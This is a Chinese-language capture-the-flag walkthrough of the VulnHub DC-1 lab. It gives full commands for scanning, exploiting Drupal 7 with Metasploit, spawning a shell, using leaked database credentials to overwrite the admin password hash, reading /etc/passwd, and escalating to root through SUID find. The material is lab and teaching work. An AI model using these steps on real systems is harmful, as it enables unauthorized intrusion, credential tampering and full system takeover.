文章目录
环境搭建
靶机:DC-1靶场
攻击机:kali
靶场下载链接: https://download.vulnhub.com/dc/DC-1.zip
环境配置
kali和靶场网络都配置为:NAT模式
0x01信息收集
1.使用nmap工具扫描网段在线主机
nmap -sS 192.168.17.1/24
开放22端口:后续可ssh连接
开放80端口:后续访问网页
2.使用whatweb查询网站基本信息
whatweb 192.168.17.130
发现CMS为Drupal 7,后续可扫有没有版本漏洞
注: Drupal是一种免费开源的内容管理系统(CMS),它由Drupal社区开发和维护。 Drupal可以用来创建各种类型的网站,包括博客、企业网站、社交网络和电子商务网站等。
3.使用dirsearch工具扫描网站目录
dirsearch -u 192.168.17.130
提示没工具的话,用apt安装
apt install dirsearch
扫到一堆好似没有发现重要的
0x02渗透测试
利用MSF工具扫描Drupal 7有没有版本漏洞
1.启动MSF
msfconsole
2搜索漏洞
search Drupal 7
3利用漏洞
尝试验证后发现编号为1的exp可以利用,选择进入
use 1
输入options获取配置内容
options
yes选项是必须配置的,如:rhosts
设置rhosts
set rhosts 192.168.17.130
注:
rhosts:靶机IP地址
lhosts:攻击机IP地址
配置完成后输入run开始攻击
出现meterpreter
代表渗透成功
输入shell
获取目标主机的远程命令行shell
发现是非交互式界面,可以利用python实现交互式
python -c 'import pty;pty.spawn("/bin/bash")'
此时非完全交互式,不能用删除,上下键等等。也就是命令一定要输对,不然就得重新手输,烦的很
4寻找到flag1,2,4
利用find
命令查找flag
find / -name "flag*.txt"
好好好,发现了flag1
和flag4
咱们先用cat
命令来查看flag1
cat /var/www/flag1.txt
flag1提示配置文件
ok,继续用find查找
find / -name "config*"
配置文件一般在/var/www
的路径目录下
查询无果
想起来是CMS是drupal,浏览器查询发现配置文件在 /sites/default/settings.php
再find一下
find / -name settings.php
用cat查看一下内容
发现flag2提示暴力破解获权限没用
同时发现一个数据库账号和密码
直接用mysql登录
mysql -udbuser -pR0ck3t
注意:-u和-p后面没有空格,直接加用户名和密码
接下来查看数据库
show databases;
注意加 ;号
前面配置文件提示是drupaldb
数据库
直接进入
use drupaldb;
查看都有什么表
show tables;
发现users可疑,进去瞧瞧
select * from users\G;
/G 的作用是将查到的结构旋转90度变成纵向
发现两个用户,密码是hash加密的
破解密码思路:john工具爆破;mysql命令更新密码
ok,先无脑爆破一手
先把密码复制到文本里然后运行命令
john passwd.txt
等了好久好久,发现没有进展
好好好flag2诚不欺我,果然无法爆破
那接下来只好寻找加密文件了
find / -name "*hash*" 2>/dev/null
cat命令查看源码
cat /var/www/scripts/password-hash.sh
发现注释说明要php运行
那么bash运行肯定会报错
下面选一个运行(第一个是通用的,首选)
./scripts/password-hash.sh
php ./scripts/password-hash.sh
根据用法提示我们来加密 1234
./scripts/password-hash.sh "1234"
接下来复制hash,回到mysql中
,替换admin的密码
update users set pass="$S$Dkx2b6iXIYHFb1SEsiAAWOT6rtsczcU65xAai7Q7EHE.00p4KSDh" where name="admin";
mysql>update 表名 set 字段=“值” where 子句 order by 子句 limit 子句
WHERE 子句:可选项。用于限定表中要修改的行。若不指定,则修改表中所有的行。
5登录网页(发现flag3,4)
利用admin和修改后的密码登录网页
点点点后发现flag3
提示shadow,在Linux系统中,/etc/shadow
目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件
shadow没有权限的话,那就查看/etc/passwd
还提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束 ;, 该分号前面要放反斜杠转义(后续提权用到)
shadow和passwd差别大家可以参考这篇文章
https://blog.csdn.net/qq_43531669/article/details/123490284
cat /etc/passwd
好好好,又发现了flag4,这回打开看看
cd /home/flag4
cat flag4.txt
5提权
提示用flag3的提示方法提权
先看一下当前用户的suid权限(让普通用户临时拥有该文件的属主的执行权限)
find / -perm -u=s -type f 2>/dev/null
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)
发现有find,可以利用find提权
find / -exec "/bin/bash" -p \;
find
是一个用于查找文件和目录的命令。/
是指要在根目录下进行查找。-exec
是一个选项,用于在找到的每个文件上执行一个命令。"/bin/bash"
是要执行的命令,这里是一个指向Bash shell的路径。-p
是Bash shell的选项,用于启用特权模式,即以管理员权限运行。\;
是一个分隔符,用于告诉find
命令在每个找到的文件上执行命令。
因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。
成功提权
前往root目录下查找最后的flag
cd /root
ls
cat thefinalflag.txt
结束!!!